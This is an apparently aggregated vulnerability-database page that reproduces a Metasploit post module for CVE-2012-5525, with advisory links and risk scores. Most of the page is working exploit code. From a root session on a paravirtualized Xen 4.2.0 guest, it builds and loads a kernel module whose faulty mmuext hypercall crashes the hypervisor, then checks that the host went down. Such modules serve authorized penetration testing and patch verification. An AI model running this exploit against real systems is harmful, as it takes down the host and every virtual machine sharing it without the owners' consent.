
Linux DoS Xen 4.2.0 2012-5525

🗓️ 13 Apr 2016 01:31:02 — Reported by Christoph Sendner <[email protected]>, Aleksandar Milenkoski <[email protected]> — Type
metasploit
🔗 www.rapid7.com👁 49 Views

This module causes a hypervisor crash in Xen 4.2.0 when invoked from a paravirtualized VM, including from dom0. Successfully tested on Debian 7 3.2.0-4-amd64 with Xen 4.2.0.

Circl
CVE-2012-5525
29 May 201815:50
circl
CVE
CVE-2012-5525
13 Dec 201211:00
cve
Cvelist
CVE-2012-5525
13 Dec 201211:00
cvelist
Debian CVE
CVE-2012-5525
13 Dec 201211:00
debiancve
EUVD
EUVD-2012-5417
7 Oct 202500:30
euvd
Fedora
[SECURITY] Fedora 18 Update: xen-4.2.0-6.fc18
12 Dec 201200:16
fedora
Tenable Nessus
Fedora 18 : xen-4.2.0-6.fc18 (2012-19652)
12 Dec 201200:00
nessus
Tenable Nessus
GLSA-201309-24 : Xen: Multiple vulnerabilities
28 Sep 201300:00
nessus
Gentoo Linux
Xen: Multiple vulnerabilities
27 Sep 201300:00
gentoo
NVD
CVE-2012-5525
13 Dec 201211:53
nvd
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  ##
  # Post module for CVE-2012-5525 (see 'References'): from inside a
  # paravirtualized Xen 4.2.0 guest it builds and loads a small kernel
  # module (source in +c_code+) whose init routine issues the faulty
  # hypercall.  Every check and action runs through +cmd_exec+ on the
  # existing session, so the session must be a root shell on a guest that
  # has gcc/g++/make and headers matching the running kernel.
  #
  # Artifacts left on the guest (relevant for detection and cleanup): a
  # randomly named directory under +WritableDir+ holding the .c file, the
  # Makefile and the build output (the Makefile passes -save-temps, so the
  # compiler's intermediate files are kept as well).  Nothing in this
  # module removes that directory, and a loaded module is visible to the
  # guest's normal module listing until the host goes down.
  ##

  ##
  # Registers the module metadata and the +WritableDir+ option.
  #
  # @param info [Hash] module info merged by +update_info+
  ##

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux DoS Xen 4.2.0 2012-5525',
        'Description' => %q{
          This module causes a hypervisor crash in Xen 4.2.0 when invoked from a
          paravirtualized VM, including from dom0.  Successfully tested on Debian 7
          3.2.0-4-amd64 with Xen 4.2.0.
        },
        'References' => [ ['CVE', '2012-5525'] ],
        'License' => MSF_LICENSE,
        'Author' => [
          'Christoph Sendner <christoph.sendner[at]stud-mail.uni-wuerzburg.de>',
          'Aleksandar Milenkoski  <aleksandar.milenkoski[at]uni-wuerzburg.de>'
        ],
        'Platform' => [ 'linux' ],
        'Arch' => [ARCH_X64],
        'SessionTypes' => ['shell']
      )
    )

    register_options(
      [
        # Base directory for the randomly named working directory; the
        # default '/tmp' must be writable and allow compiling there.
        OptString.new('WritableDir', [true, 'A directory for storing temporary files on the target system', '/tmp'])
      ], self.class
    )
  end

  ##
  # Entry point: derives the working-directory path, verifies the
  # preconditions, writes the sources, builds/loads the module and finally
  # probes the session to decide whether the host went down.
  #
  # @return [void]
  ##

  def run
    # Variables
    # 7..11 random letters keep the directory from colliding with existing
    # paths and make the on-disk artifact name differ per run.
    @rand_folder = '/' + Rex::Text.rand_text_alpha(rand(7..11)).to_s
    # NOTE(review): WritableDir is concatenated as-is (no shell escaping);
    # it is operator-supplied, but a trailing '/' yields a double slash.
    @writeable_folder = datastore['WritableDir'].to_s + @rand_folder

    # Testing requirements
    print_status('Detecting requirements...')
    return unless requirements_met?

    # Creating and writing random paths and files
    vprint_status('Creating random file and folder names')
    write_files

    # Execute make and insmod
    do_insmod

    # Testing success of DoS
    test_success
  end

  ##
  # Test all requirements:
  #  - root privileges
  #  - build-essentials
  #  - xen-environment (existing, not running)
  #  - xen-running
  #  - xen-version (DoS only works on specific versions)
  #
  # The checks run in this order on purpose: +right_xen_version?+ calls
  # +xl info+, which only makes sense once Xen is known to be running.
  # Each failed check prints an error and stops the module.
  #
  # @return [Boolean] true when every check passed
  ##

  def requirements_met?
    unless is_root?
      print_error('Root access is required')
      return false
    end
    print_good('Detected root privilege')

    unless build_essential?
      print_error('No build-essential package found')
      return false
    end
    print_good('Detected build-essential')

    unless xen?
      print_error('Running Xen was not found')
      return false
    end
    print_good('Detected Xen')

    unless xen_running?
      print_error('Xen is not running')
      return false
    end
    print_good('Detected running Xen')

    unless right_xen_version?
      print_error('Incorrect Xen version running')
      return false
    end
    print_good('Detected correct Xen version')

    true
  end

  ##
  # Checks for build essentials
  #  - Required for building a lkm
  #  - checks for gcc/g++, make and linux-headers
  #  - commands sh-conform
  #
  # The dpkg/linux-headers test is Debian-specific (it matches the tested
  # Debian 7 target); other distributions fail this check even when headers
  # are installed.
  # NOTE(review): the `$( which ... )` expansions are unquoted, so when
  # `which` prints nothing the test degrades to `[ -s ]`, which POSIX sh
  # evaluates as a single non-empty argument (true) - a missing tool may
  # therefore go undetected; confirm before relying on this check.
  #
  # @return [Boolean] true only when the shell printed exactly "OK"
  ##

  def build_essential?
    check_command = 'if [ -s $( which gcc ) ] && '
    check_command << '[ -s $( which g++ ) ] && '
    check_command << '[ -s $( which make ) ] && '
    check_command << '[ "$( dpkg -l | grep linux-headers-$(uname -r) )" != "" ] ;'
    check_command << 'then echo OK;'
    check_command << 'fi'

    # delete("\r") strips carriage returns some session types append.
    cmd_exec(check_command).delete("\r") == 'OK'
  end

  ##
  # Checks for running Xen Hypervisor
  #  - Looks for Xen in lsmod, lscpu, dmesg and /sys/bus
  #  - commands sh-conform
  #
  # All probes are read-only and any one match is enough.  Note the greps
  # are case-sensitive: lsmod/dmesg are searched for "xen", lscpu for "Xen".
  # The final probe only checks that an +xl+ binary is on PATH.
  #
  # @return [Boolean] true only when the shell printed exactly "OK"
  ##

  def xen?
    check_command = 'if [ "$( lsmod | grep xen )" != "" ] || '
    check_command << '[ "$( lscpu | grep Xen )" != "" ] || '
    check_command << '[ "$( dmesg | grep xen )" != "" ] || '
    check_command << '[ "$( which xl )" != "" ] ;'
    check_command << 'then echo OK;'
    check_command << 'fi'

    cmd_exec(check_command).delete("\r") == 'OK'
  end

  ##
  # Checks for running Xen
  #  - Host eventually has Xen installed, but not running
  #  - DoS needs a running Xen on Host
  #  - Presence of either xenstored pid file under /var/run is taken as
  #    "running"; a stale pid file would satisfy this test too.
  #
  # @return [Boolean] true only when the shell printed exactly "OK"
  ##

  def xen_running?
    check_command = 'if [ -f /var/run/xenstored.pid -o -f /var/run/xenstore.pid ] ; then echo OK; fi'

    cmd_exec(check_command).delete("\r") == 'OK'
  end

  ##
  # Checks for Xen Version
  #  - Most DoS of Xen require a specific version - here: 4.2.0
  #  - commands need running Xen - so execute after test for xen
  #
  # Runs +xl info+ three times and keeps only the digit runs of the
  # xen_major / xen_minor / xen_extra lines (grep -o '[0-9]*' drops any
  # non-digit characters such as a leading dot in xen_extra), then joins
  # them as "major.minor.extra".  Anything that does not parse cleanly
  # simply fails the equality test and stops the module; whether +xl+
  # error output reaches +cmd_exec+ depends on the session - unverified.
  #
  # @return [Boolean] true when the assembled version string is "4.2.0"
  ##

  def right_xen_version?
    cmd_major = "xl info | grep xen_major | grep -o '[0-9]*'"
    xen_major = cmd_exec(cmd_major).delete("\r")
    cmd_minor = "xl info | grep xen_minor | grep -o '[0-9]*'"
    xen_minor = cmd_exec(cmd_minor).delete("\r")
    cmd_extra = "xl info | grep xen_extra | grep -o '[0-9]*'"
    xen_extra = cmd_exec(cmd_extra).delete("\r")

    xen_version = xen_major + '.' + xen_minor + '.' + xen_extra

    print_status('Xen Version: ' + xen_version)

    xen_version == '4.2.0'
  end

  ##
  # Creating and writing files:
  #  - c_file for c-code
  #  - Makefile
  #
  # Sets @c_name (random 7..11 letters, also the module's object name in
  # the Makefile), @c_file and @make_file, creates the working directory
  # with a plain +mkdir+ (no -p, so a missing +WritableDir+ makes it fail)
  # and writes both files via +write_file+.  Failures of +mkdir+ are not
  # checked here; they surface later when +make+ runs.
  #
  # @return [void]
  ##

  def write_files
    @c_name = Rex::Text.rand_text_alpha(rand(7..11)).to_s
    @c_file = "#{@writeable_folder}/#{@c_name}.c"
    @make_file = "#{@writeable_folder}/Makefile"

    vprint_status("Creating folder '#{@writeable_folder}'")
    cmd_exec("mkdir #{@writeable_folder}")

    vprint_status("Writing C code to '#{@c_file}'")
    write_file(@c_file, c_code)
    vprint_status("Writing Makefile to '#{@make_file}'")
    write_file(@make_file, make_code)
  end

  ##
  # Compiling and execute LKM
  #  - builds with the Makefile from +make_code+, then loads the resulting
  #    .ko by absolute path; loading is what runs the init routine
  #  - neither the +make+ nor the +insmod+ result is inspected; a build
  #    failure is only noticed indirectly by +test_success+
  #
  # NOTE(review): the +cd+ runs in its own +cmd_exec+ call; whether the
  # working directory carries over to the following +make+ (and to the
  # Makefile's $(PWD)) depends on the session type - confirm against the
  # session implementation in use.
  #
  # @return [void]
  ##

  def do_insmod
    cmd_exec("cd #{@writeable_folder}")
    vprint_status('Making module...')
    cmd_exec('make')
    vprint_status("Insmod '#{@writeable_folder}/#{@c_name}.ko'")
    cmd_exec("insmod #{@writeable_folder}/#{@c_name}.ko")
  end

  ##
  # Test for success via ssh-error exception
  #  - Host down => ssh-error => DoS successful
  #  - +is_root?+ is used purely as a liveness probe; presumably it raises
  #    RuntimeError with the exact message compared below once the shell
  #    returns no output for the UID lookup (host gone).
  #  - Any other RuntimeError is re-raised, and the +ensure+ clause still
  #    reports the failure first; a normal return (host still answering)
  #    is likewise reported as "DoS has failed".
  #
  # @return [void]
  # @raise [RuntimeError] re-raised when +is_root?+ fails for another reason
  ##

  def test_success
    successful = false
    begin
      is_root?
    rescue RuntimeError => e
      successful = true if e.message == 'Could not determine UID: ""'
      raise unless successful
    ensure
      if successful
        print_good('DoS was successful!')
      else
        print_error('DoS has failed')
      end
    end
  end

  ##
  # Returns Makefile to compile
  #  - LKMs need a Makefile
  #  - Needs the linux-headers, make and gcc
  #  - The squiggly heredoc is interpolating: @c_name becomes the obj-m
  #    target and the "\t" escapes become the tabs make requires before
  #    recipe lines.
  #  - -save-temps keeps the preprocessed/assembly intermediates next to
  #    the .ko, which enlarges the on-disk footprint left behind.
  #
  # @return [String] Makefile contents
  ##

  def make_code
    m = <<~END
      obj-m := #{@c_name}.o

      EXTRA_CFLAGS+= -save-temps

      all:
      \t$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

      clean:
      \t$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
    END
    m
  end

  ##
  # Returns the c-Code to compile
  #  - Contains the essential bug to crash Xen
  #  - Here: Force a segmentation fault via hypercall, which crashes the host
  #  - The source is a plain init/exit kernel module; the single
  #    HYPERVISOR_mmuext_op call in lkm_init is the CVE-2012-5525 trigger
  #    and the C comments inside the heredoc describe its arguments.
  #  - The heredoc is interpolating, so the source must not contain "#{";
  #    the preprocessor lines ("#undef", "#define", "#include") are safe.
  #
  # @return [String] C source of the kernel module
  ##

  def c_code
    c = <<~END
      #undef __KERNEL__
      #define __KERNEL__
      #undef MODULE
      #define MODULE
      #include <linux/module.h>
      #include <asm/xen/hypercall.h>
      MODULE_LICENSE("GPL");
      static int __init lkm_init(void)
      {
      struct mmuext_op op;
      int status;
      op.cmd = 16; /*MMUEXT_CLEAR_PAGE*/
      op.arg1.mfn = 0x0EEEEE; /*A large enough MFN*/
      HYPERVISOR_mmuext_op(&op, 1, &status, DOMID_SELF);
      return 0;
      }
      static void __exit lkm_cleanup(void)
      {
      }
      module_init(lkm_init);
      module_exit(lkm_cleanup);
    END
    c
  end
end

6.9Medium risk
Vulners AI Score6.9
CVSS 24.7
EPSS0.06889